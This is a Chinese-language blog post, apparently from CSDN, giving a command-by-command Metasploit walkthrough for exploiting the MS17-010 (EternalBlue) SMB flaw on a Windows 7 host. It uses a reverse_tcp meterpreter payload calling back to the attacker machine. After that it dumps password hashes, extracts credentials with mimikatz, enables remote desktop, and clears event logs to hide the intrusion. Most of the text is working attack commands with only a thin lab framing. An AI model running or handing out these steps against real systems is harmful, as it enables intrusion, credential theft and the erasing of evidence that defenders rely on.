Kali攻击MS17-010系统漏洞

攻击机:192.168.1.7  kali linux2019.2  x64

靶机:192.168.1.5     win7   x64(455端口一定要开启,系统不能带有ms17-010补丁,通过https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010查看补丁名称,并删除掉靶机里面的ms17-010补丁)

一、通过msfconsole命令进入msfconsole模块

命令:msfconsole

二、进入ms17_010的扫描模块

命令:use auxiliary/scanner/smb/smb_ms17_010

三、设置扫描的目标或者范围

命令:auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.5 若要范围扫描,则将IP改为 192.168.1.*

四、扫描

命令:run

192.168.1.5:445存在漏洞!!

五、切换到ms17_010的攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue

六、设置目标机ip

命令:set RHOST 192.168.1.5

七、设置payload

命令:set payload windows/x64/meterpreter/reverse_tcp

八、设置本机监听ip ,默认LPORT端口为4444 (可以通过show options查看 如果不是4444就设置)

命令:set LHOST 192.168.1.7

九、开始执行漏洞利用模块

命令:exploit

当出现meterpreter> 说明利用成功,如下图

十、远程操作目标主机

migrate 616 关闭对方防火墙
screenshot  截屏
hashdump    获取目标机hash值

load mimikatz    启动mimikatz

msv         导出hash值
kerberos    获得目标机的账号密码(要是空密码,就要自己创建一个用户,不过会被安全软件拦截)
另开一个终端(!!!!!!!!!!是另开一个!!!!!!!!)
rdesktop 192.168.1.66 -u 账号 -p 密码 
要是连不上就要开3389
run getgui -e   开3389命令,然后再执行上一条命令
clearev    擦除痕迹再跑路
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值